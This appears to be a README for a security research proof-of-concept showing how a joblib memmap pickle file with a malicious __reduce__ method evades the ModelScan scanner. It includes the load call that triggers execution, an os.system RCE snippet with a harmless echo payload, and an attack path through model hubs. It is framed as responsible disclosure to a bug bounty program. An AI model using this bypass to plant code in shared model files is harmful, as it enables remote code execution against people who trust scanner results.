# ModelScan Bypass - Memory-Mapped Array ⭐ PRIMARY FINDING

**Security Research - ModelScan Bypass Technique**

## Overview

This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan,
a popular ML model security scanner. This technique allows malicious pickle-based model files
to evade detection.

## Technique

**Memory-mapped array bypass**

Uses joblib's memmap feature with malicious __reduce__ method

## ModelScan Result

**SCANNED but found NO ISSUES ✅ (TRUE BYPASS)**

## File

- `exploit_memmap_bypass.joblib`

## Reproduction Steps

### Testing with ModelScan

```bash
# Install ModelScan
pip install modelscan

# Download the exploit file from this repository
# Then scan it
modelscan scan -p exploit_memmap_bypass.joblib
```

### Expected Result

SCANNED but found NO ISSUES ✅ (TRUE BYPASS)

### Triggering the Exploit (⚠️ DO NOT RUN ON PRODUCTION)

```python
import joblib

# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_memmap_bypass.joblib')
```

## Technical Details

This exploit uses Python's pickle `__reduce__` method for RCE:

```python
def __reduce__(self):
    import os
    return (os.system, ('echo "RCE executed!"',))
```

**Why ModelScan misses this:**

Uses joblib's memmap feature with malicious __reduce__ method

## Security Impact

**Severity**: HIGH

**Attack Vector**:
1. Attacker creates malicious model using this technique
2. Uploads to model hub (HuggingFace, etc.)
3. Victim downloads and scans with ModelScan
4. Scanner reports "No issues found!" or skips the file
5. Victim loads model → RCE

## Part of Larger Research

This is one of four bypass techniques discovered:

1. [Compression Mismatch](https://huggingface.co/sandeep1337/modelscan-bypass-compression-mismatch)
2. [Double Compression](https://huggingface.co/sandeep1337/modelscan-bypass-double-compression)
3. [Corrupt Header](https://huggingface.co/sandeep1337/modelscan-bypass-corrupt-header)
4. [Memmap Bypass ⭐](https://huggingface.co/sandeep1337/modelscan-bypass-memmap) - PRIMARY FINDING

## Disclosure

This research is being submitted to Huntr's bug bounty program for responsible disclosure.

**Date**: December 25, 2024
**Researcher**: Security Research Team

## References

- [Huntr Bug Bounty](https://huntr.com/)
- [ModelScan GitHub](https://github.com/protectai/modelscan)

## Disclaimer

⚠️ **For Security Research Only**

This file is provided for security research and vulnerability disclosure purposes only.
Do not use this technique for malicious purposes. Loading this file will execute code.

---

**Status**: Under responsible disclosure to Huntr bug bounty program